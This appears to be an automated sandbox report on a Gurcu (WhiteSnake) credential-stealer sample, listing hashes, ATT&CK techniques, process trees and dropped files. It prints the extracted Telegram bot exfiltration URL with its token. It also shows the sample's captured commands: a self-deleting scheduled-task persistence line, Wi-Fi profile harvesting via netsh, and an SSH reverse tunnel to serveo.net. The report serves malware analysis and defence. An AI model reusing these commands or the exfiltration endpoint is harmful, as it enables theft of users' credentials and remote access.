gurcu | 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff

General

Target

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Size

9.1MB
MD5

1bafb4856a31ae27271fbd2ee1574a4f
SHA1

b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
SHA512

e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
SSDEEP

3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D

Score

10^/10

gurcu collection discovery persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389

https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendDocumen

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Executes dropped EXE 2 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

pid	process
1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
15	ip-api.com

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

cmd.exenetsh.execmd.exenetsh.exe

pid process

848 cmd.exe
4892 netsh.exe
3904 cmd.exe
3432 netsh.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1608 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

1092 schtasks.exe

pid	process
848	cmd.exe
4892	netsh.exe
3904	cmd.exe
3432	netsh.exe

pid	process
1608	timeout.exe

pid	process
1092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

pid	process
1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

description	pid	process
Token: SeDebugPrivilege	2364	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Token: SeDebugPrivilege	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.execmd.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.execmd.execmd.exe91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.execmd.execmd.exe

description	pid	process	target process
PID 2364 wrote to memory of 1944	2364	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 2364 wrote to memory of 1944	2364	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 1944 wrote to memory of 4440	1944	cmd.exe	chcp.com
PID 1944 wrote to memory of 4440	1944	cmd.exe	chcp.com
PID 1944 wrote to memory of 1608	1944	cmd.exe	timeout.exe
PID 1944 wrote to memory of 1608	1944	cmd.exe	timeout.exe
PID 1944 wrote to memory of 1092	1944	cmd.exe	schtasks.exe
PID 1944 wrote to memory of 1092	1944	cmd.exe	schtasks.exe
PID 1944 wrote to memory of 1804	1944	cmd.exe	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
PID 1944 wrote to memory of 1804	1944	cmd.exe	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
PID 1804 wrote to memory of 848	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 1804 wrote to memory of 848	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 848 wrote to memory of 4940	848	cmd.exe	chcp.com
PID 848 wrote to memory of 4940	848	cmd.exe	chcp.com
PID 848 wrote to memory of 4892	848	cmd.exe	netsh.exe
PID 848 wrote to memory of 4892	848	cmd.exe	netsh.exe
PID 848 wrote to memory of 4596	848	cmd.exe	findstr.exe
PID 848 wrote to memory of 4596	848	cmd.exe	findstr.exe
PID 1804 wrote to memory of 4896	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 1804 wrote to memory of 4896	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 4896 wrote to memory of 2144	4896	cmd.exe	chcp.com
PID 4896 wrote to memory of 2144	4896	cmd.exe	chcp.com
PID 4896 wrote to memory of 1268	4896	cmd.exe	netsh.exe
PID 4896 wrote to memory of 1268	4896	cmd.exe	netsh.exe
PID 4896 wrote to memory of 3000	4896	cmd.exe	findstr.exe
PID 4896 wrote to memory of 3000	4896	cmd.exe	findstr.exe
PID 1804 wrote to memory of 2836	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	ssh.exe
PID 1804 wrote to memory of 2836	1804	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	ssh.exe
PID 1476 wrote to memory of 3904	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 1476 wrote to memory of 3904	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 3904 wrote to memory of 4816	3904	cmd.exe	chcp.com
PID 3904 wrote to memory of 4816	3904	cmd.exe	chcp.com
PID 3904 wrote to memory of 3432	3904	cmd.exe	netsh.exe
PID 3904 wrote to memory of 3432	3904	cmd.exe	netsh.exe
PID 3904 wrote to memory of 4424	3904	cmd.exe	findstr.exe
PID 3904 wrote to memory of 4424	3904	cmd.exe	findstr.exe
PID 1476 wrote to memory of 2184	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 1476 wrote to memory of 2184	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	cmd.exe
PID 2184 wrote to memory of 1732	2184	cmd.exe	chcp.com
PID 2184 wrote to memory of 1732	2184	cmd.exe	chcp.com
PID 2184 wrote to memory of 4660	2184	cmd.exe	netsh.exe
PID 2184 wrote to memory of 4660	2184	cmd.exe	netsh.exe
PID 2184 wrote to memory of 2144	2184	cmd.exe	findstr.exe
PID 2184 wrote to memory of 2144	2184	cmd.exe	findstr.exe
PID 1476 wrote to memory of 3864	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	ssh.exe
PID 1476 wrote to memory of 3864	1476	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe	ssh.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

outlook_win_path 1 IoCs

Processes:

91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
"C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4440
- - C:\Windows\system32\timeout.exe
    timeout /t 3
    3⤵
    - Delays execution with timeout.exe
    PID:1608
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1092
- - C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
    "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:848
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4940
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4892
    - - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:4596
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4896
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2144
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1268
    - - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:3000
  - - C:\Windows\System32\OpenSSH\ssh.exe
      "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2817 serveo.net
      4⤵
      PID:2836

C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1476
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  - Suspicious use of WriteProcessMemory
  PID:3904
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4816
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3432
- - C:\Windows\system32\findstr.exe
    findstr /R /C:"[ ]:[ ]"
    3⤵
    PID:4424
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1732
- - C:\Windows\system32\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4660
- - C:\Windows\system32\findstr.exe
    findstr "SSID BSSID Signal"
    3⤵
    PID:2144
- C:\Windows\System32\OpenSSH\ssh.exe
  "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2817 serveo.net
  2⤵
  PID:3864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

2

T1552

Credentials In Files

1

T1552.001

Credentials in Registry

1

T1552.002

Discovery

Browser Information Discovery

Query Registry

System Information Discovery

2

T1082

System Network Configuration Discovery

1

T1016

Wi-Fi Discovery

1

T1016.002

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.ssh\known_hosts

Filesize
406B

MD5
ec266d309cbad86b3e4939f2117dfe39

SHA1
cf12599fbdc167b4c01b518a0bd63d51cd83798b

SHA256
2f8ecca5380615bcd1530817933a7ea03d2d4fdc7d6e634829aa54e40413b05d

SHA512
d2d39d9174f459146de57c205979e7815829c37eafd214cdce88f90a961f04e5468290e530cf31b9b621276a86eb3a071bbf3464962e1a8e44a7478794571baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe.log

Filesize
847B

MD5
3308a84a40841fab7dfec198b3c31af7

SHA1
4e7ab6336c0538be5dd7da529c0265b3b6523083

SHA256
169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

SHA512
97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

Download Submit
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe

Filesize
9.1MB

MD5
1bafb4856a31ae27271fbd2ee1574a4f

SHA1
b8b3649d959524df2c4e8a94434fc0de90f95005

SHA256
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff

SHA512
e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25

Download Submit
C:\Users\Admin\AppData\Local\phgsswc3mw\p.dat

Filesize
4B

MD5
182e6c2d3d78eef40e5dac7da77a748f

SHA1
732217de58820ef4dc0353a910df674a58084629

SHA256
8202c37e994f4722947e63d7fa9193fc924fe0d3ea11f7fba2fbf11ef6bab963

SHA512
41ba067dc4b4e6d42cbc75fc321780e604ce6aa9ccdfe6fdd57f79948e3a8587c7baae09a0daa9c593970709c1ed191c31dbfac5d9d23c4b2b227d6ea1299e62

Download Submit
memory/1804-11-0x00007FFCECAF0000-0x00007FFCED5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1804-14-0x00007FFCECAF0000-0x00007FFCED5B1000-memory.dmp

Filesize
10.8MB

Download
memory/2364-0-0x00007FFCECE23000-0x00007FFCECE25000-memory.dmp

Filesize
8KB

Download
memory/2364-1-0x0000024980070000-0x0000024980096000-memory.dmp

Filesize
152KB

Download
memory/2364-4-0x00007FFCECE20000-0x00007FFCED8E1000-memory.dmp

Filesize
10.8MB

Download
memory/2364-6-0x00007FFCECE20000-0x00007FFCED8E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads